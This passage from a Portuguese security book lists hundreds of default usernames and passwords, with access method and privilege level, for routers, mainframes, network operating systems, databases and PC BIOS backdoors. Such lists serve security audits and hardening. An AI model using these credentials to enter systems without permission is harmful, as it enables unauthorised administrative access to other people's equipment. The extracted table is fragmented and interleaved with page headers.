Cisco IOS Multi n/a Cisco router

Cisco IOS SNMP public ReadOnly access

secret Read

Cisco IOS SNMP private ReadWrite access

secret Read/Write

Cisco IOS Multi ripeop (no pw)

Cisco PIX Telnet n/a cisco UID = pix

Cisco- Arrowpoint admin system Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

308

Arrowpoint Compaq Insight Manager administrator administ

rator Admin

Compaq Insight Manager anonymous (none) User

Compaq Insight Manager operator operator

Compaq Insight Manager user public User

Compaq PC BIOS Console

n/a Compaq

Admin

Compualynx

Cproxy Server All Versions

Multi administrator asecret Admin

Compualynx

Cmail Server All Versions

Multi administrator asecret Admin

Compualynx

SCM All Versions

Multi administrator asecret Admin

Concord PC BIOS n/a last Admin

Crystalview

OutsideView 32 Crystal Admin

CTX International

PC BIOS Console

n/a CTX_123

Admin

CyberMax

PC BIOS Console

n/a Congress

Admin

Daewoo PC BIOS Console

n/a Daewuu Admin

Dallas Semiconductors

TINI embedded JAVA Module

<= 1.0

Telnet root tini Admin

Data General

AOS/VS Multi operator operator Admin

Data General

AOS/VS Multi op op Admin

Data General

AOS/VS Multi op operator Admin

Datacom BSASX/101 n/a letmein Admin

Datacom NSBrowse Multi sysadm sysadm Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

309

Daytek PC BIOS Console

n/a Daytec Admin

Debian Linux LILO Default

2.2

Console

n/a tatercounter2000

Admin

Dell PC BIOS Console

n/a Dell Admin

Develcon

Orbitor Default Console

n/a BRIDGE

Admin

Develcon

Orbitor Default Console

n/a password

Admin

Dictaphone

ProLog NETOP (none)

Dictaphone

ProLog NETWORK NETWORK

Dictaphone

ProLog PBX PBX

Digicorp Viper Telnet n/a BRIDGE

Admin

Digicorp Viper Telnet n/a password

Admin

Digital Equipment

DEC-10 Multi 1 syslib Admin

Digital Equipment

DEC-10 Multi 1 operator Admin

Digital Equipment

DEC-10 Multi 1 manager

Admin

Digital Equipment

DEC-10 Multi 2 maintain

Admin

Digital Equipment

DEC-10 Multi 2 syslib Admin

Digital Equipment

DEC-10 Multi 2 manager

Admin

Digital Equipment

DEC-10 Multi 2 operator Admin

Digital Equipment

DEC-10 Multi 30 games User

Digital Equipment

DEC-10 Multi 5 games User

Digital Equipment

DEC-10 Multi 7 maintain

User

Digital Equipment

DecServer Multi n/a ACCESS

Admin

Digital Equipment

DecServer Multi n/a SYSTEM

Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

310

Digital Equipment

IRIS Multi accounting accounting

Admin

Digital Equipment

IRIS Multi boss boss Admin

Digital Equipment

IRIS Multi demo demo User

Digital Equipment

IRIS Multi manager manager

Admin

Digital Equipment

IRIS Multi PDP11 PDP11 User

Digital Equipment

IRIS Multi PDP8 PDP8 User

Digital Equipment

IRIS Multi software software

User

Digital Equipment

PC BIOS Console

n/a komprie Admin

Digital Equipment

RSX Multi 1,1 SYSTEM

Admin

Digital Equipment

RSX Multi BATCH BATCH User

Digital Equipment

RSX Multi SYSTEM MANAGER

Admin

Digital Equipment

RSX Multi SYSTEM SYSTEM

Admin

Digital Equipment

RSX Multi USER USER User

Digital Equipment

Terminal Server Port 7000

n/a access User

Digital Equipment

Terminal Server Port 7000

n/a system Admin

Digital Equipment

VMS Multi ALLIN1 ALLIN1

Digital Equipment

VMS Multi ALLIN1MAIL ALLIN1MAIL

Digital Equipment

VMS Multi ALLINONE ALLINONE

Digital Equipment

VMS Multi BACKUP BACKUP

Terrorismo Tecnológico Aprenda Para Sobreviver

311

Digital Equipment

VMS Multi DCL DCL

Digital Equipment

VMS Multi DECMAIL DECMAIL

Digital Equipment

VMS Multi DECNET DECNET

Digital Equipment

VMS Multi DECNET NONPRIV

Digital Equipment

VMS Multi DECNET DECNET

Digital Equipment

VMS Multi DEFAULT USER

Digital Equipment

VMS Multi DEFAULT DEFAULT

Digital Equipment

VMS Multi DEMO DEMO

Digital Equipment

VMS Multi FIELD FIELD

Digital Equipment

VMS Multi FIELD SERVICE

Digital Equipment

VMS Multi FIELD TEST

Digital Equipment

VMS Multi FIELD DIGITAL

Digital Equipment

VMS Multi GUEST GUEST

Digital Equipment

VMS Multi HELP HELP

Digital Equipment

VMS Multi HELPDESK HELPDESK

Digital Equipment

VMS Multi HOST HOST

Digital Equipment

VMS Multi HOST HOST

Digital Equipment

VMS Multi INFO INFO

Digital Equipment

VMS Multi INGRES INGRES

Terrorismo Tecnológico Aprenda Para Sobreviver

312

Digital Equipment

VMS Multi LINK LINK

Digital Equipment

VMS Multi MAILER MAILER

Digital Equipment

VMS Multi MBMANAGER MBMANAGER

Digital Equipment

VMS Multi MBWATCH MBWATCH

Digital Equipment

VMS Multi NETCON NETCON

Digital Equipment

VMS Multi NETMGR NETMGR

Digital Equipment

VMS Multi NETNONPRIV NETNONPRIV

Digital Equipment

VMS Multi NETPRIV NETPRIV

Digital Equipment

VMS Multi NETSERVER NETSERVER

Digital Equipment

VMS Multi NETSERVER NETSERVER

Digital Equipment

VMS Multi NETWORK NETWORK

Digital Equipment

VMS Multi NEWINGRES NEWINGRES

Digital Equipment

VMS Multi NEWS NEWS

Digital Equipment

VMS Multi OPERVAX OPERVAX

Digital Equipment

VMS Multi POSTMASTER

POSTMASTER

Digital Equipment

VMS Multi PRIV PRIV

Digital Equipment

VMS Multi REPORT REPORT

Digital Equipment

VMS Multi RJE RJE

Digital Equipment

VMS Multi STUDENT STUDENT

Terrorismo Tecnológico Aprenda Para Sobreviver

313

Digital Equipment

VMS Multi SYS SYS

Digital Equipment

VMS Multi SYSMAINT SYSMAINT

Digital Equipment

VMS Multi SYSMAINT SERVICE

Digital Equipment

VMS Multi SYSMAINT DIGITAL

Digital Equipment

VMS Multi SYSTEM SYSTEM

Digital Equipment

VMS Multi SYSTEM MANAGER

Digital Equipment

VMS Multi SYSTEM OPERATOR

Digital Equipment

VMS Multi SYSTEM SYSLIB

Digital Equipment

VMS Multi SYSTEST UETP

Digital Equipment

VMS Multi SYSTEST_CLIG

SYSTEST_CLIG

Digital Equipment

VMS Multi SYSTEST_CLIG

SYSTEST

Digital Equipment

VMS Multi TELEDEMO TELEDEMO

Digital Equipment

VMS Multi TEST TEST

Digital Equipment

VMS Multi UETP UETP

Digital Equipment

VMS Multi USER PASSWORD

Digital Equipment

VMS Multi USERP USERP

Digital Equipment

VMS Multi VAX VAX

Digital Equipment

VMS Multi VMS VMS

D-Link hubs/switches Telnet D-Link D-Link

Dynix Library

Dynix Multi circ <social sec #>

User

Terrorismo Tecnológico Aprenda Para Sobreviver

314

Systems

Dynix Library Systems

Dynix Multi LIBRARY (none) User

Dynix Library Systems

Dynix Multi SETUP (none) Admin

Efficient Speedstream DSL

Telnet n/a admin Admin

Elsa LANCom Office ISDN Router

800/1000/1100

Telnet n/a cisco Admin

Elsa LANCom Office ISDN Router

800/1000/1100

Telnet n/a (none) Admin

Enox PC BIOS Console

n/a xo11nE Admin

Epox PC BIOS Console

n/a central Admin

Ericsson Ericsson Acc netman netman

Flowpoint

DSL 2000

Telnet admin admin Admin

Flowpoint

DSL Telnet n/a password

Admin

Flowpoint

Flowpoint/2000 ADSL

Telnet n/a (none) Admin

Freetech PC BIOS Console

n/a Posterie Admin

Galacticomm

Major BBS Multi Sysop Sysop Admin

GuardOne

Restrictor Multi n/a guardone

Admin

GuardOne

BizGuard Multi n.a guardone

Admin

glFtpD glFtpD all

Console

glftpd glftpd Admin

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi ADVMAIL HPOFFICE,DATA

Terrorismo Tecnológico Aprenda Para Sobreviver

315

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi ADVMAIL HP

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD SUPPORT

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD MGR

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD SERVICE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD MANAGER

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD HPP187,SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD LOTUS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD HPWORD,PUB

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi FIELD HPONLY

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi HELLO MANAGER.SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi HELLO MGR.SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi HELLO FIELD.SUPPORT

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi HELLO OP.OPERATOR

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MAIL MAIL

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MAIL REMOTE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MAIL TELESUP

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MAIL HPOFFICE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MAIL MPE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER TCH

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER SECURITY

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER ITF3000

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER HPOFFICE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER COGNOS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MANAGER TELESUP

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGE VESOFT

Hewlett- HP 2000/3000 Multi MGE VESOF

Terrorismo Tecnológico Aprenda Para Sobreviver

316

Packard MPE/xx T

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR CAROLIAN

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR VESOFT

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR XLSERVER

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR SECURITY

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR TELESUP

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPDESK

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR CCC

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR CNAS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR WORD

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR COGNOS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR ROBELLE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPOFFICE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPONLY

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPP187

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPP189

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR HPP196

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR INTX3

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR ITF3000

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR NETBASE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR REGO

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR RJE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi MGR CONV

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi OPERATOR SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi OPERATOR DISC

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi OPERATOR SYSTEM

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi OPERATOR SUPPORT

Terrorismo Tecnológico Aprenda Para Sobreviver

317

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi OPERATOR COGNOS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi PCUSER SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi RSBCMON SYS

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi SPOOLMAN HPOFFICE

Hewlett-Packard

HP 2000/3000 MPE/xx

Multi WP HPOFFICE

Hewlett-Packard

Vectra Console

n/a hewlpack

Admin

IBM AIX Multi guest (none) User

IBM AIX Multi guest guest User

IBM Ascend OEM Routers

Telnet n/a ascend Admin

IBM OS/400 Multi 11111111 11111111

IBM OS/400 Multi 22222222 22222222

IBM OS/400 Multi ibm password

IBM OS/400 Multi ibm 2222

IBM OS/400 Multi ibm service

IBM OS/400 Multi qpgmr qpgmr

IBM OS/400 Multi qsecofr qsecofr

IBM OS/400 Multi qsecofr 11111111

IBM OS/400 Multi qsecofr 22222222

IBM OS/400 Multi qserv qserv

IBM OS/400 Multi qsrv qsrv

IBM OS/400 Multi qsrvbas qsrvbas

IBM OS/400 Multi qsvr qsvr

IBM OS/400 Multi qsvr ibmcel

IBM OS/400 Multi qsysopr qsysopr

IBM OS/400 Multi quser quser

IBM OS/400 Multi user USERP

IBM OS/400 Multi secofr secofr

IBM OS/400 Multi sedacm secacm

IBM OS/400 Multi sysopr sysopr

IBM PC BIOS Console

n/a IBM Admin

IBM PC BIOS Console

n/a MBIU0 Admin

IBM PC BIOS Console

n/a sertafu Admin

IBM POS CMOS Console

ESSEX

Terrorismo Tecnológico Aprenda Para Sobreviver

318

IBM POS CMOS Console

IPC

IBM VM/CMS Multi $ALOC$ (none)

IBM VM/CMS Multi ADMIN (none)

IBM VM/CMS Multi AP2SVP (none)

IBM VM/CMS Multi APL2PP (none)

IBM VM/CMS Multi AUTOLOG1 (none)

IBM VM/CMS Multi BATCH (none)

IBM VM/CMS Multi BATCH1 (none)

IBM VM/CMS Multi BATCH2 (none)

IBM VM/CMS Multi CCC (none)

IBM VM/CMS Multi CMSBATCH (none)

IBM VM/CMS Multi CMSUSER (none)

IBM VM/CMS Multi CPNUC (none)

IBM VM/CMS Multi CPRM (none)

IBM VM/CMS Multi CSPUSER (none)

IBM VM/CMS Multi CVIEW (none)

IBM VM/CMS Multi DATAMOVE (none)

IBM VM/CMS Multi DEMO1 (none)

IBM VM/CMS Multi DEMO2 (none)

IBM VM/CMS Multi DEMO3 (none)

IBM VM/CMS Multi DEMO4 (none)

IBM VM/CMS Multi DIRECT (none)

IBM VM/CMS Multi DIRMAINT (none)

IBM VM/CMS Multi DISKCNT (none)

IBM VM/CMS Multi EREP (none)

IBM VM/CMS Multi FSFADMIN (none)

IBM VM/CMS Multi FSFTASK1 (none)

IBM VM/CMS Multi FSFTASK2 (none)

IBM VM/CMS Multi GCS (none)

IBM VM/CMS Multi IDMS (none)

IBM VM/CMS Multi IDMSSE (none)

IBM VM/CMS Multi IIPS (none)

IBM VM/CMS Multi IPFSERV (none)

IBM VM/CMS Multi ISPVM (none)

IBM VM/CMS Multi IVPM1 (none)

IBM VM/CMS Multi IVPM2 (none)

IBM VM/CMS Multi MAINT (none)

IBM VM/CMS Multi MOESERV (none)

IBM VM/CMS Multi NEVIEW (none)

Terrorismo Tecnológico Aprenda Para Sobreviver

319

IBM VM/CMS Multi OLTSEP (none)

IBM VM/CMS Multi OP1 (none)

IBM VM/CMS Multi OPERATNS (none)

IBM VM/CMS Multi OPERATOR (none)

IBM VM/CMS Multi PDMREMI (none)

IBM VM/CMS Multi PENG (none)

IBM VM/CMS Multi PROCAL (none)

IBM VM/CMS Multi PRODBM (none)

IBM VM/CMS Multi PROMAIL (none)

IBM VM/CMS Multi PSFMAINT (none)

IBM VM/CMS Multi PVM (none)

IBM VM/CMS Multi RDM470 (none)

IBM VM/CMS Multi ROUTER (none)

IBM VM/CMS Multi RSCS (none)

IBM VM/CMS Multi RSCSV2 (none)

IBM VM/CMS Multi SAVSYS (none)

IBM VM/CMS Multi SFCMI (none)

IBM VM/CMS Multi SFCNTRL (none)

IBM VM/CMS Multi SMART (none)

IBM VM/CMS Multi SQLDBA (none)

IBM VM/CMS Multi SQLUSER (none)

IBM VM/CMS Multi SYSADMIN (none)

IBM VM/CMS Multi SYSCKP (none)

IBM VM/CMS Multi SYSDUMP1 (none)

IBM VM/CMS Multi SYSERR (none)

IBM VM/CMS Multi SYSWRM (none)

IBM VM/CMS Multi TDISK (none)

IBM VM/CMS Multi TEMP (none)

IBM VM/CMS Multi TSAFVM (none)

IBM VM/CMS Multi VASTEST (none)

IBM VM/CMS Multi VM3812 (none)

IBM VM/CMS Multi VMARCH (none)

IBM VM/CMS Multi VMASMON (none)

IBM VM/CMS Multi VMASSYS (none)

IBM VM/CMS Multi VMBACKUP (none)

IBM VM/CMS Multi VMBSYSAD (none)

IBM VM/CMS Multi VMMAP (none)

IBM VM/CMS Multi VMTAPE (none)

IBM VM/CMS Multi VMTLIBR (none)

Terrorismo Tecnológico Aprenda Para Sobreviver

320

IBM VM/CMS Multi VMUTIL (none)

IBM VM/CMS Multi VSEIPO (none)

IBM VM/CMS Multi VSEMAINT (none)

IBM VM/CMS Multi VSEMAN (none)

IBM VM/CMS Multi VTAM (none)

IBM VM/CMS Multi VTAMUSER (none)

Intel Shiva Multi Guest (none) User

Intel Shiva Multi root (none) Admin

Intel Shiva Lanrovers Multi root (none) Admin

Intel LanRover VPN Gateway

< 6.0

Multi n/a isolation Admin

Intel LanRover VPN Gateway

6.0 >

Multi n/a shiva Admin

Interbase

Interbase Database Server

All

Multi SYSDBA masterkey

Admin

IRC IRC Daemon IRC n/a FOOBAR

Acess

Iwill PC BIOS Console

n/a iwill Admin

JD Edwards

WorldVision/OneWorld

All(?)

TCP 1964

JDE JDE Admin/SECOFR

Jetform Jetform Design HTTP Jetform (none) Admin

JetWay PC BIOS Console

n/a spooml Admin

Joss Technology

PC BIOS Console

n/a 57gbzb Admin

Joss Technology

PC BIOS Console

n/a technolgi

Admin

Lantronics

Lantronics Terminal Server

TCP 7000

n/a access Admin

Lantronics

Lantronics Terminal Server

TCP 7000

n/a system Admin

Leading Edge

PC BIOS Console

n/a MASTER

Admin

Linksys DSL Telnet n/a admin Admin

Linux Slackware Multi gonzo (none) User

Linux Slackware Multi satan (none) User

Linux Slackware Multi snake (none) User

Linux UCLinux for UCSIMM

Multi root uClinux Admin

Livingston

IRX Router Telnet !root (none)

Terrorismo Tecnológico Aprenda Para Sobreviver

321

Livingston

Livingston Portmaster 3

Telnet !root (none)

Livingston

Officerouter Telnet !root (none)

Lucent System 75 Multi bciim bciimpw

Lucent System 75 Multi bcim bcimpw

Lucent System 75 Multi bcms bcmspw

Lucent System 75 Multi bcms bcmspw

Lucent System 75 Multi bcnas bcnaspw

Lucent System 75 Multi blue bluepw

Lucent System 75 Multi browse browsepw

Lucent System 75 Multi browse looker

Lucent System 75 Multi craft craft

Lucent System 75 Multi craft craftpw

Lucent System 75 Multi craft craftpw

Lucent System 75 Multi cust custpw

Lucent System 75 Multi enquiry enquirypw

Lucent System 75 Multi field support

Lucent System 75 Multi inads indspw

Lucent System 75 Multi inads indspw

Lucent System 75 Multi inads inads

Lucent System 75 Multi init initpw

Lucent System 75 Multi locate locatepw

Lucent System 75 Multi maint maintpw

Lucent System 75 Multi maint rwmaint

Lucent System 75 Multi nms nmspw

Lucent System 75 Multi pw pwpw

Lucent System 75 Multi rcust rcustpw

Lucent System 75 Multi support supportpw

Lucent System 75 Multi sysadm sysadmpw

Lucent System 75 Multi sysadm admpw

Lucent System 75 Multi sysadm syspw

Lucent System 75 Multi tech field

M Technology

PC BIOS Console

n/a mMmM Admin

MachSpeed

PC BIOS Console

n/a sp99dd Admin

Magic-Pro

PC BIOS Console

n/a prost Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

322

Megastar

PC BIOS Console

n/a star Admin

Mentec Micro/RSX Multi MICRO RSX Admin

Micron PC BIOS Console

n/a sldkj754 Admin

Micron PC BIOS Console

n/a xyzall Admin

Micronics

PC BIOS Console

n/a dn_04rjc

Admin

Microplex

Print Server Telnet root root Admin

Microsoft

Windows NT Multi (null) (none) User

Microsoft

Windows NT Multi Administrator Administrator

Admin

Microsoft

Windows NT Multi Administrator (none) Admin

Microsoft

Windows NT Multi Guest Guest User

Microsoft

Windows NT Multi Guest (none) User

Microsoft

Windows NT Multi IS_$hostname (same) User

Microsoft

Windows NT Multi User User User

Mintel Mintel PBX n/a SYSTEM

Admin

Motorola Cablerouter Telnet cablecom router Admin

MySQL MySQL all versions

root (none) Admin

NCR NCR UNIX Multi ncrm ncrm Admin

NetGenesis

NetAnalysis Web Reporting

HTTP naadmin naadmin

Admin

Netopia Netopia 7100 Telnet (none) (none) Admin

Netopia Netopia 9500 Telnet netopia netopia Admin

NetworkICE

ICECap Manager 2.0.22 <

8081 iceman (none) Admin

NeXT NeXTStep Multi me (none) User

NeXT NeXTStep Multi root NeXT Admin

NeXT NeXTStep Multi signa signa User

Nimble PC BIOS Console

n/a xdfk9874t3

Admin

Nortel Accelar (Passport) 1000 séries routing switches

Multi l2 l2 Layer 2 Read Write

Nortel Accelar (Passport) 1000 séries routing

Multi l3 l3 Layer 3 (and layer 2) Read

Terrorismo Tecnológico Aprenda Para Sobreviver

323

switches Write

Nortel Accelar (Passport) 1000 séries routing switches

Multi ro ro Read Only

Nortel Accelar (Passport) 1000 séries routing switches

Multi rw rw Read Write

Nortel Accelar (Passport) 1000 séries routing switches

Multi rwa rwa Read Write All

Nortel Extranet Switches

Multi admin setup Admin

Nortel Meridian PBX Serial login 0000

Nortel Meridian PBX Serial spcl 0000

Nortel Remote Office 9150

Client admin root Admin

Novell Netware Multi ADMIN ADMIN

Novell Netware Multi ADMIN (none)

Novell Netware Multi ARCHIVIST (none)

Novell Netware Multi ARCHIVIST ARCHIVIST

Novell Netware Multi BACKUP (none)

Novell Netware Multi BACKUP BACKUP

Novell Netware Multi CHEY_ARCHSVR

CHEY_ARCHSVR

Novell Netware Multi CHEY_ARCHSVR

(none)

Novell Netware Multi FAX FAX

Novell Netware Multi FAX (none)

Novell Netware Multi FAXUSER FAXUSER

Novell Netware Multi FAXUSER (none)

Novell Netware Multi FAXWORKS (none)

Novell Netware Multi FAXWORKS FAXWORKS

Novell Netware Multi GATEWAY GATEWAY

Novell Netware Multi GATEWAY GATEWAY

Novell Netware Multi GATEWAY (none)

Novell Netware Multi GUEST TSEUG

Novell Netware Multi GUEST GUESTGUEST

Novell Netware Multi GUEST GUESTGUE

Novell Netware Multi GUEST GUEST

Terrorismo Tecnológico Aprenda Para Sobreviver

324

Novell Netware Multi GUEST (none)

Novell Netware Multi HPLASER (none)

Novell Netware Multi HPLASER HPLASER

Novell Netware Multi LASER (none)

Novell Netware Multi LASER LASER

Novell Netware Multi LASERWRITER

LASERWRITER

Novell Netware Multi LASERWRITER

(none)

Novell Netware Multi MAIL (none)

Novell Netware Multi MAIL MAIL

Novell Netware Multi POST (none)

Novell Netware Multi POST POST

Novell Netware Multi PRINT (none)

Novell Netware Multi PRINT PRINT

Novell Netware Multi PRINTER (none)

Novell Netware Multi PRINTER PRINTER

Novell Netware Multi ROOT (none)

Novell Netware Multi ROOT ROOT

Novell Netware Multi ROUTER (none)

Novell Netware Multi SABRE (none)

Novell Netware Multi SUPERVISOR NETFRAME

Novell Netware Multi SUPERVISOR NFI

Novell Netware Multi SUPERVISOR NF

Novell Netware Multi SUPERVISOR HARRIS

Novell Netware Multi SUPERVISOR SUPERVISOR

Novell Netware Multi SUPERVISOR (none)

Novell Netware Multi SUPERVISOR SYSTEM

Novell Netware Multi TEST TEST

Novell Netware Multi TEST (none)

Novell Netware Multi USER_TEMPLATE

(none)

Novell Netware Multi USER_TEMPLATE

USER_TEMPLATE

Novell Netware Multi WANGTEK (none)

Novell Netware Multi WANGTEK WANGTEK

Novell Netware Multi WINDOWS_PASSTHRU

WINDOWS_PASSTHRU

Novell Netware Multi WINDOWS_PASSTHRU

(none)

Novell Netware Multi WINSABRE SABRE

Terrorismo Tecnológico Aprenda Para Sobreviver

325

Novell Netware Multi WINSABRE WINSABRE

Nurit PC BIOS Console

$system (none) Admin

Oracle Oracle RDBMS 7,8

Multi ADAMS WOOD

Oracle Oracle RDBMS 7,8

Multi APPLSYS APPLSYS

Oracle Oracle RDBMS 7,8

Multi APPS APPS

Oracle Oracle RDBMS 7,8

Multi AURORA@ORB@UNAUTHENTICATED

INVALID

Oracle Oracle RDBMS 7,8

Multi BLAKE PAPER

Oracle Oracle RDBMS 7,8

Multi CLARK CLOTH

Oracle Oracle RDBMS 7,8

Multi CTXDEMO CTXDEMO

Oracle Oracle RDBMS 7,8

Multi CTXSYS CTXSYS

Oracle Oracle RDBMS 7,8

Multi DBSNMP DBSNMP

RESOURCE and CONNECT roles

Oracle Oracle RDBMS 7,8

Multi DEMO DEMO

Oracle Oracle RDBMS 7,8

Multi JONES STEEL

Oracle Oracle RDBMS 7,8

Multi MDSYS MDSYS

Oracle Oracle RDBMS 7,8

Multi NAMES NAMES

Oracle Oracle RDBMS 7,8

Multi ORDPLUGINS ORDPLUGINS

Oracle Oracle RDBMS 7,8

Multi OUTLN OUTLN

Oracle Oracle RDBMS 7,8

Multi RMAN RMAN

Oracle Oracle RDBMS 7,8

Multi SCOTT TIGER

Oracle Oracle RDBMS 7,8

Multi SYS CHANGE_ON_INSTALL

DBA +

Oracle Oracle RDBMS 7,8

Multi SYSADM SYSADM

Oracle Oracle RDBMS 7,8

Multi SYSTEM MANAGER

Oracle Oracle RDBMS 7,8

Multi TRACESRV TRACE

Oracle Personal Oracle 8 Multi PO8 PO8

Osicom JETXPrint 1000E

Telnet sysadm sysadm Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

326

/B

Osicom JETXPrint 1000E/N

Telnet sysadm sysadm Admin

Osicom JETXPrint 1000T/N

Telnet sysadm sysadm Admin

Osicom JETXPrint 500 E/B

Telnet sysadm sysadm Admin

Osicom NETCommuter Remote Access Server

Telnet debug d.e.b.u.g User

Osicom NETCommuter Remote Access Server

Telnet echo echo User

Osicom NETCommuter Remote Access Server

Telnet guest guest User

Osicom NETCommuter Remote Access Server

Telnet Manager Manager Admin

Osicom NETCommuter Remote Access Server

Telnet sysadm sysadm Admin

Osicom NETPrint 1500 E/B Telnet

debug d.e.b.u.g User

Osicom NETPrint 1000E/D Telnet

debug d.e.b.u.g User

Osicom NETPrint 1000E/NDS Telnet

debug d.e.b.u.g User

Osicom NETPrint 1500E/N Telnet

debug d.e.b.u.g User

Osicom NETPrint 2000E/N Telnet

debug d.e.b.u.g User

Osicom NETPrint 1500 E/B Telnet

echo echo User

Osicom NETPrint 1000E/D Telnet

echo echo User

Terrorismo Tecnológico Aprenda Para Sobreviver

327

Osicom NETPrint 1000E/NDS Telnet

echo echo User

Osicom NETPrint 1500E/N Telnet

echo echo User

Osicom NETPrint 2000E/N Telnet

echo echo User

Osicom NETPrint 1500 E/B Telnet

guest guest User

Osicom NETPrint 1000E/D Telnet

guest guest User

Osicom NETPrint 1000E/NDS Telnet

guest guest User

Osicom NETPrint 1500E/N Telnet

guest guest User

Osicom NETPrint 2000E/N Telnet

guest guest User

Osicom NETPrint 1500 E/B Telnet

Manager Manager Admin

Osicom NETPrint 1000E/D Telnet

Manager Manager Admin

Osicom NETPrint 1000E/NDS Telnet

Manager Manager Admin

Osicom NETPrint 1500E/N Telnet

Manager Manager Admin

Osicom NETPrint 2000E/N Telnet

Manager Manager Admin

Osicom NETPrint 1000E/NDS Telnet

sysadm sysadm Admin

Osicom NETPrint 1500E/N Telnet

sysadm sysadm Admin

Osicom NETPrint 2000E/N Telnet

sysadm sysadm Admin

Osicom NETPrint 1000E/B Telnet

sysadm sysadm Admin

Osicom NETPrint 2000E/B Telnet

sysadm sysadm Admin

Osicom NETPrint 1000E/N Telnet

sysadm sysadm Admin

Terrorismo Tecnológico Aprenda Para Sobreviver

328

Osicom NETPrint 2000E/N Telnet

sysadm sysadm Admin

Osicom NETPrint 1000 T/B Telnet

sysadm sysadm Admin

Osicom NETPrint 2000 T/B Telnet

sysadm sysadm Admin

Osicom NETPrint 1000 T/N Telnet

sysadm sysadm Admin

Osicom NETPrint 2000 T/N Telnet

sysadm sysadm Admin

Osicom NETPrint 1500 E/B Telnet

sysadm sysadm Admin

Osicom NETPrint 1500E/N Telnet

sysadm sysadm Admin

Osicom NETPrint 1500T/N Telnet

sysadm sysadm Admin

Osicom NETPrint 1000E/D Telnet

sysadm sysadm Admin

Osicom NETPrint 500 E/B Telnet

sysadm sysadm Admin

Osicom NETPrint 500 E/N Telnet

sysadm sysadm Admin

Osicom NETPrint 500 T/B Telnet

sysadm sysadm Admin

Osicom NETPrint 500 T/N Telnet

sysadm sysadm Admin

Osicom Osicom Plus T1/PLUS 56k

Telnet

write private

Packard Bell

PC BIOS Console

n/a bell9 Admin

Prime PrimeOS Multi

dos dos User

Prime PrimeOS Multi

guest guest User

Prime PrimeOS Multi

guest1 guest User

Prime PrimeOS Multi

guest1 guest1 User

Prime PrimeOS Multi

fam fam User

Prime PrimeOS Multi

mail mail User

Terrorismo Tecnológico Aprenda Para Sobreviver

329

Prime PrimeOS Multi

maint maint User

Prime PrimeOS Multi

mfd mfd User

Prime PrimeOS Multi

netlink netlink User

Prime PrimeOS Multi

prime prime User

Prime PrimeOS Multi

prime primeos User

Prime PrimeOS Multi

primeos prime User

Prime PrimeOS Multi

primeos primeos User

Prime PrimeOS Multi

primenet primenet User

Prime PrimeOS Multi

primenet primeos User

Prime PrimeOS Multi

primos_cs

primos User

Prime PrimeOS Multi

primos_cs

prime User

Prime PrimeOS Multi

system prime Admin

Prime PrimeOS Multi

system system Admin

Prime PrimeOS Multi

tele tele User

Prime PrimeOS Multi

test test User

QDI PC BIOS Console

n/a QDI Admin

QDI SpeedEasy BIOS Console

n/a lesarotl Admin

Quantex PC BIOS Console

n/a teX1 Admin

